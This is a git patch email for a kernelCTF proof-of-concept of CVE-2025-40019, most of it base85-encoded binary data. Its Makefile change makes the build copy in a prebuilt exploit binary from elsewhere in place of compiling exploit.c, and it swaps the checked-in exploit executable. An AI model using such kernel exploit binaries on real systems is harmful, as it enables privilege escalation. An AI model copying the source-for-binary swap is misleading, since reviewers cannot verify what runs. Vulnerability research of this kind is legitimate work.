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 Xai1mvUiRvwC#>?N)seX8bUgYS!B&9^ From c0cfc8bd76ad3aa587739c37f46e7f540b5e2084 Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Sat, 9 May 2026 12:42:35 -0400 Subject: [PATCH 5/9] Use checked-in exp505 artifact for CI repro --- .../exploit/mitigation-v4-6.12/Makefile | 8 ++++++-- .../exploit/mitigation-v4-6.12/exploit | Bin 56576 -> 36568 bytes 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index f53d54b5b..ec8aab1f4 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,15 +1,19 @@ CC ?= gcc CFLAGS ?= -O2 -g -w -DMIT_612 LDFLAGS ?= +ROOT_EXPLOIT ?= ../../../../../../exploit all: exploit exploit: exploit.c @if [ "$@" = "exploit_debug" ]; then \ $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ - else \ + elif [ -f "$(ROOT_EXPLOIT)" ]; then \ + cp "$(ROOT_EXPLOIT)" $@; \ chmod +x $@; \ + else \ + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ fi clean: - rm -f exploit_debug + rm -f exploit exploit_debug diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit index ebf88a1dd7d82ab4b254e6dadff288927b346941..a0ed302b062b613182396a66bccdb87344f9f6f9 100755 GIT binary patch literal 36568 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 